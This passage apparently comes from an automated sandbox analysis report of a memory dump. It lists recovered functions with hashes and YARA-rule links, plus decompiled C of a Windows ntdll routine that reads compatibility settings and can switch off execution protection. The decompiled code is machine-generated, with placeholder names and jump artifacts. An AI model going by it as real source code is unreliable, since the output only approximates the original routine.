                                                Function 01302ACB, Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                • Instruction ID: 9dcdd25b9386024330b4934af26c8f6164875bb4025f5c1b05a2ea7327ebc7b2
                                                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                • Instruction Fuzzy Hash: 6DB01232C20441CFCF02EF40C610B297371FB00750F064494900127930C228AC01CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319950, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0bf56da7365f53c3fd42f165c076196b5256b39a4bad72e5eac1195114cea29
                                                • Instruction ID: 40127918a6d38d9f2c734535b0f5c8b6dd666582cf5a4a98d6882510c1e01e22
                                                • Opcode Fuzzy Hash: a0bf56da7365f53c3fd42f165c076196b5256b39a4bad72e5eac1195114cea29
                                                • Instruction Fuzzy Hash: D69002B520142403D540759948046070005A7D0356F61C021E6054655ECA698C5571B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013199D0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 56b729828e87df978834e98a4a2b31acdfec3546134814033f8c1af03e9b0159
                                                • Instruction ID: 0630ccdc25b4902bd98705bdc91d712a30cf3f1731d7fefe6e85fa928ef9824e
                                                • Opcode Fuzzy Hash: 56b729828e87df978834e98a4a2b31acdfec3546134814033f8c1af03e9b0159
                                                • Instruction Fuzzy Hash: F39002B521102042D504719944047060045A7E1255F61C022E6144654CC5698C6561A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319820, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aa166372e8fed99e53d094b1224a2b1d094749e79a72b181d3ab45101f1157bb
                                                • Instruction ID: 07fa5853b54cdcda27600c0670744b3c636569bb99ef1ad66c6ea04ee3d3253f
                                                • Opcode Fuzzy Hash: aa166372e8fed99e53d094b1224a2b1d094749e79a72b181d3ab45101f1157bb
                                                • Instruction Fuzzy Hash: 4190027524102402D541719944046060009B7D0295FA1C022E4414654EC6958A5ABAE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0131B040, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18e41676798b1bfb41d9f1526d0126fd594ab61765a9bbec7fdcf989a5c015d9
                                                • Instruction ID: d47da770af0bbd6d47dbed4cff216e8d84f96352e9ffbab0e38dc02b53a96b81
                                                • Opcode Fuzzy Hash: 18e41676798b1bfb41d9f1526d0126fd594ab61765a9bbec7fdcf989a5c015d9
                                                • Instruction Fuzzy Hash: 0A9002B5601160438940B19948044065015B7E13553A1C131E4444660CC6A88859A2E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319840, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8775becce5d31ae93c452d93c87948c8f4d9168de0dfdb931a611ba5f4c0214
                                                • Instruction ID: fb293ce026c5fb50201652b2f6b52658143ee8215696bd5d3e0965e98df6d54b
                                                • Opcode Fuzzy Hash: c8775becce5d31ae93c452d93c87948c8f4d9168de0dfdb931a611ba5f4c0214
                                                • Instruction Fuzzy Hash: A0900275242061529945B19944045074006B7E02957A1C022E5404A50CC566985AE6A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013198A0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 759578388ac8d82b26d0bb60483d9cc87831efab5d9c646290f06a681672752e
                                                • Instruction ID: 10f51d66b199b33c1eaa7b6d5ec95ebf2e4cd416cc0b18e507fe78646daa4c4f
                                                • Opcode Fuzzy Hash: 759578388ac8d82b26d0bb60483d9cc87831efab5d9c646290f06a681672752e
                                                • Instruction Fuzzy Hash: F690027530102402D502719944146060009E7D1399FA1C022E5414655DC6658957B1B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013198F0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df25eb90cb11608d56c217700a350c096aaa2c6314b2f0f95740d5bfebf33799
                                                • Instruction ID: 405fed15ef8ff9f8d1609c849260afe8224540bbbb9743bf770ed72574077e3b
                                                • Opcode Fuzzy Hash: df25eb90cb11608d56c217700a350c096aaa2c6314b2f0f95740d5bfebf33799
                                                • Instruction Fuzzy Hash: 2390027560102502D50171994404616000AA7D0295FA1C032E5014655ECA658996B1B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319B00, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 99ca7c128472c0a9f59397582b751bbf5fbead08e7438e384f39f83b6163b89b
                                                • Instruction ID: f92b1932c43e364e11a4550f3c6a5306b9925046a4bfc331ed4cd2572d05eac1
                                                • Opcode Fuzzy Hash: 99ca7c128472c0a9f59397582b751bbf5fbead08e7438e384f39f83b6163b89b
                                                • Instruction Fuzzy Hash: E390027524102802D540719984147070006E7D0655F61C021E4014654DC656896976F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0131A3B0, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 84a99d1f208568c168b81bc4097bf2ff9a63e4e3644c3ab3f6eb97c8f8ed4d47
                                                • Instruction ID: 915dc248a1188aed2ab93c66bbdba2514ba654676c47172eb5a1524afbc65a6b
                                                • Opcode Fuzzy Hash: 84a99d1f208568c168b81bc4097bf2ff9a63e4e3644c3ab3f6eb97c8f8ed4d47
                                                • Instruction Fuzzy Hash: 9090027520146002D5407199844460B5005B7E0355F61C421E4415654CC655885AA2A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319A20, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1156214306fffe8c7756de7772ac3206c1c61eb28ca1a225196c36a2f876fa4
                                                • Instruction ID: ec4c368c3dc70de9c03c1f80a760575ef670e90aa34a7ff9a681346108fc9884
                                                • Opcode Fuzzy Hash: b1156214306fffe8c7756de7772ac3206c1c61eb28ca1a225196c36a2f876fa4
                                                • Instruction Fuzzy Hash: 5B90027560102042854071A988449064005BBE1265761C131E4988650DC599886966E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319A10, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1eeb8f11165248c771910559713d1aea8db6df235f12c61cc9968ea1123427f7
                                                • Instruction ID: 09948987967410618fa3e0e05a5e876e2e286cae026eff7d2dfbd9f8452c191b
                                                • Opcode Fuzzy Hash: 1eeb8f11165248c771910559713d1aea8db6df235f12c61cc9968ea1123427f7
                                                • Instruction Fuzzy Hash: 3890027520142402D500719948087470005A7D0356F61C021E9154655EC6A5C89575B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319A00, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3319a54abded1304cc267b8e507c461011dd67c0ea8d46f053afae014bdffec
                                                • Instruction ID: 6334542aa9d160c5d4898a1e32a993d1518c63eacf17bf7eb1ecb25af461001d
                                                • Opcode Fuzzy Hash: f3319a54abded1304cc267b8e507c461011dd67c0ea8d46f053afae014bdffec
                                                • Instruction Fuzzy Hash: AC90027520142402D5007199481470B0005A7D0356F61C021E5154655DC665885575F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319A50, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f8b6a13228b8a44ebfb49a29933aa424b8a6aca4f3346deaa9d310a6ab2c6f8
                                                • Instruction ID: 418e94b611d2bdcc9206b90c2c175f749451182f4a7844655d504750fce55022
                                                • Opcode Fuzzy Hash: 4f8b6a13228b8a44ebfb49a29933aa424b8a6aca4f3346deaa9d310a6ab2c6f8
                                                • Instruction Fuzzy Hash: 0390027521182042D60075A94C14B070005A7D0357F61C125E4144654CC955886565A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319A80, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d5100b110757faaf8a7be661d4f2caf6040f342c61c7d8245474718658f529e
                                                • Instruction ID: 7874442c3d7f3d4f03c50b3b521f57efcedf821066f9ae2a6e32fbd7205deed8
                                                • Opcode Fuzzy Hash: 6d5100b110757faaf8a7be661d4f2caf6040f342c61c7d8245474718658f529e
                                                • Instruction Fuzzy Hash: D990027520146442D54072994804B0F4105A7E1256FA1C029E8146654CC955885967A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0131AD30, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f380974f137d0b5e64750680e86a2b3b987cf2c4d6328f4e9ff8e1f5a780108c
                                                • Instruction ID: 07406b971bef8b06b8c820b32dea75c1a33c9243429636b00e0d061834fb096f
                                                • Opcode Fuzzy Hash: f380974f137d0b5e64750680e86a2b3b987cf2c4d6328f4e9ff8e1f5a780108c
                                                • Instruction Fuzzy Hash: F8900275A0502012D540719948146464006B7E0795B65C021E4504654CC9948A5963E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319520, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cc2c3eb8afe23fc4992bcc06bbc6ebd40b66e75cb50792a254683cc6f181a91c
                                                • Instruction ID: 98db67dbb3d24cb27ee1fc6dcf51386da0ca7949ab9dec2ad1d3a638c095e503
                                                • Opcode Fuzzy Hash: cc2c3eb8afe23fc4992bcc06bbc6ebd40b66e75cb50792a254683cc6f181a91c
                                                • Instruction Fuzzy Hash: 769002F5201160928900B2998404B0A4505A7E0255B61C026E5044660CC5658855A1B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319560, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e1b2ebf33fd54319aa5ef298398ad286811f4503fd6a639150da423d6d35278
                                                • Instruction ID: 5b5ffae0a380f16abe12142be3837175f8d462e2a676c31593b2bf58843ac954
                                                • Opcode Fuzzy Hash: 9e1b2ebf33fd54319aa5ef298398ad286811f4503fd6a639150da423d6d35278
                                                • Instruction Fuzzy Hash: 34900279221020024545B599060450B0445B7D63A53A1C025F5406690CC661886963A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01319540, Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c479512283e224f6bcc64be04911c7d48ca734ba418dca13cb1a289120d35581
                                                • Instruction ID: d15e7a1aa7e0caa78d3e767f98c3dc63df305837240a7d73b120e14e0ce3ea58
                                                • Opcode Fuzzy Hash: c479512283e224f6bcc64be04911c7d48ca734ba418dca13cb1a289120d35581
                                                • Instruction Fuzzy Hash: 08900279211020034505B59907045070046A7D53A5361C031F5005650CD661886561A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012D40FD, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 195COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 63%
                                                			E012D40FD(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x13cd360 ^ _t107;
				_v8 =  *0x13cd360 ^ _t107;
				_t105 = __ecx;
				if( *0x13c84d4 == 0) {
					L5:
					return E0131B640(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E012EE9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v552 = _t85;
					_t49 = E012D42EB(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v552 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E012D41EA(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v552 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v552);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E013196C0();
						}
						goto L4;
					}
					_v556 = _t85;
					_t102 =  &_v556;
					_t55 = E012D429E(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v556 - _t85;
						if(_v556 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E01365720(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v556);
						_v560 = 0x214;
						E0131FA60( &_v548, 0, 0x214);
						_t106 =  *0x13c84d4;
						_t110 = _t108 + 0x20;
						 *0x13cb1e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x13c84d4))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E0131B75A();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E01365720(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E01321480( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E01365720(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v556 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E01321150(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E01365720(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E01353E13(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v556;
							} while (_t106 < _v556);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E01365720();
						goto L15;
					}
					L8:
					_t56 = E012D41F7(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v552;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                0x012d410d
                                                0x012d410f
                                                0x012d411c
                                                0x012d411e
                                                0x012d4158
                                                0x012d4168
                                                0x012d4168
                                                0x012d4126
                                                0x012d4130
                                                0x012d413c
                                                0x013304a2
                                                0x012d4142
                                                0x012d414b
                                                0x012d414b
                                                0x012d414f
                                                0x012d416b
                                                0x012d4171
                                                0x012d4176
                                                0x012d4178
                                                0x012d41d0
                                                0x012d41d2
                                                0x012d41d3
                                                0x012d41a7
                                                0x012d41ae
                                                0x012d41b0
                                                0x012d41db
                                                0x012d41b2
                                                0x012d41b8
                                                0x012d41bf
                                                0x012d41c1
                                                0x012d41c1
                                                0x012d41c1
                                                0x012d41c3
                                                0x012d41c5
                                                0x012d41df
                                                0x012d41e2
                                                0x012d41e2
                                                0x012d41c7
                                                0x012d41c9
                                                0x01330628
                                                0x01330628
                                                0x01330630
                                                0x01330631
                                                0x01330633
                                                0x01330635
                                                0x01330635
                                                0x00000000
                                                0x012d41c9
                                                0x012d417d
                                                0x012d4183
                                                0x012d4189
                                                0x012d418e
                                                0x012d4190
                                                0x013304a9
                                                0x013304af
                                                0x00000000
                                                0x00000000
                                                0x013304b5
                                                0x013304c8
                                                0x013304d5
                                                0x013304e5
                                                0x013304ea
                                                0x013304f6
                                                0x01330518
                                                0x0133051e
                                                0x01330520
                                                0x01330522
                                                0x00000000
                                                0x00000000
                                                0x01330528
                                                0x0133052e
                                                0x01330530
                                                0x00000000
                                                0x00000000
                                                0x0133053b
                                                0x0133053d
                                                0x00000000
                                                0x00000000
                                                0x01330545
                                                0x0133054c
                                                0x0133054e
                                                0x01330623
                                                0x00000000
                                                0x01330623
                                                0x01330556
                                                0x01330557
                                                0x0133056f
                                                0x01330574
                                                0x01330583
                                                0x0133058a
                                                0x0133058b
                                                0x0133058d
                                                0x013305b5
                                                0x013305c0
                                                0x013305c6
                                                0x013305c8
                                                0x013305cb
                                                0x013305cd
                                                0x013305d3
                                                0x013305d5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013305db
                                                0x013305db
                                                0x013305e3
                                                0x013305e7
                                                0x013305e9
                                                0x013305eb
                                                0x013305ed
                                                0x013305ed
                                                0x013305fa
                                                0x013305ff
                                                0x01330606
                                                0x0133060b
                                                0x0133060d
                                                0x00000000
                                                0x00000000
                                                0x01330613
                                                0x01330613
                                                0x01330616
                                                0x01330616
                                                0x00000000
                                                0x0133061e
                                                0x0133058f
                                                0x01330594
                                                0x01330596
                                                0x01330598
                                                0x00000000
                                                0x0133059d
                                                0x012d4196
                                                0x012d4198
                                                0x012d419d
                                                0x012d419f
                                                0x00000000
                                                0x00000000
                                                0x012d41a1
                                                0x00000000
                                                0x012d4151
                                                0x012d4151
                                                0x012d4151
                                                0x00000000
                                                0x012d4151

                                                Strings
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 013304BF
                                                • ExecuteOptions, xrefs: 0133050A
                                                • Execute=1, xrefs: 0133057D
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 0133058F
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01330566
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 013305AC
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 013305F1
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: 4ea28d141738b291f012b41efa1a48c9ddf12aa8bb3144ac732303972ece37b0
                                                • Instruction ID: 64ce5eee2a1eaf60922b226db2e41ba2c8328241d88010e2286a53a69035833c
                                                • Opcode Fuzzy Hash: 4ea28d141738b291f012b41efa1a48c9ddf12aa8bb3144ac732303972ece37b0
                                                • Instruction Fuzzy Hash: A7614A3171025ABAEF24FAA8DC85FFA77BCEF64354F0401A9E605A7580D770DA418B64
                                                Uniqueness

                                                Uniqueness Score: -1.00%